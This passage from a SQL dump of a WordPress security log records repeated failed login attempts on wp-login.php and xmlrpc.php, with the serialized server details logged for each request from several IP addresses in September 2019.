12:35:48',18253416,19549848,'https://bintara.com.my/xmlrpc.php',1,0,'103.90.224.155'),(24118,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"41.242.1.163\";s:11:\"REMOTE_PORT\";s:5:\"40482\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@DPmf5CPZPc3WLyovFFgAAANQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568637758.4729\";s:12:\"REQUEST_TIME\";s:10:\"1568637758\";}}','notice','2019-09-16 12:42:40','2019-09-16 12:42:38',17737552,19228560,'https://bintara.com.my/wp-login.php',1,0,'41.242.1.163'),(24119,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"41.242.1.163\";s:11:\"REMOTE_PORT\";s:5:\"41448\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@DQXPgbK7GuRh1kKnXUgAAAIY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568637761.9361\";s:12:\"REQUEST_TIME\";s:10:\"1568637761\";}}','notice','2019-09-16 12:42:43','2019-09-16 12:42:42',18253240,19550568,'https://bintara.com.my/xmlrpc.php',1,0,'41.242.1.163'),(24120,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.41.232\";s:11:\"REMOTE_PORT\";s:5:\"56670\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@EJnPgbK7GuRh1kKnXygAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568637990.7587\";s:12:\"REQUEST_TIME\";s:10:\"1568637990\";}}','notice','2019-09-16 12:46:32','2019-09-16 12:46:31',17737200,19227472,'https://bintara.com.my/wp-login.php',1,0,'162.144.41.232'),(24121,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.41.232\";s:11:\"REMOTE_PORT\";s:5:\"57172\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@EKnPgbK7GuRh1kKnXywAAAJU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568637994.4692\";s:12:\"REQUEST_TIME\";s:10:\"1568637994\";}}','notice','2019-09-16 12:46:36','2019-09-16 12:46:34',18253408,19549848,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.41.232'),(24122,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"74.115.209.253\";s:11:\"REMOTE_PORT\";s:5:\"59320\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@GzGf5CPZPc3WLyovFugAAAM8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568638669.0615\";s:12:\"REQUEST_TIME\";s:10:\"1568638669\";}}','notice','2019-09-16 12:57:50','2019-09-16 12:57:49',17738936,19231688,'https://bintara.com.my/wp-login.php',1,0,'74.115.209.253'),(24123,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"74.115.209.253\";s:11:\"REMOTE_PORT\";s:5:\"59704\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@Gz3PgbK7GuRh1kKnZHwAAAJg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568638671.7341\";s:12:\"REQUEST_TIME\";s:10:\"1568638671\";}}','notice','2019-09-16 12:57:53','2019-09-16 12:57:52',18254632,19554560,'https://bintara.com.my/xmlrpc.php',1,0,'74.115.209.253'),(24124,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.99.251.192\";s:11:\"REMOTE_PORT\";s:5:\"36472\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@IxnPgbK7GuRh1kKnaXQAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568639174.4326\";s:12:\"REQUEST_TIME\";s:10:\"1568639174\";}}','notice','2019-09-16 13:06:16','2019-09-16 13:06:15',17738904,19231840,'https://bintara.com.my/wp-login.php',1,0,'167.99.251.192'),(24125,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.99.251.192\";s:11:\"REMOTE_PORT\";s:5:\"37165\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@Iz2f5CPZPc3WLyovGKwAAANY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568639183.3937\";s:12:\"REQUEST_TIME\";s:10:\"1568639183\";}}','notice','2019-09-16 13:06:25','2019-09-16 13:06:23',18254728,19554560,'https://bintara.com.my/xmlrpc.php',1,0,'167.99.251.192'),(24126,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.158.153\";s:11:\"REMOTE_PORT\";s:5:\"49674\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX@Jur1rBLb0GV3O7mTjTQAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568639418.1947\";s:12:\"REQUEST_TIME\";s:10:\"1568639418\";}}','notice','2019-09-16 13:10:20','2019-09-16 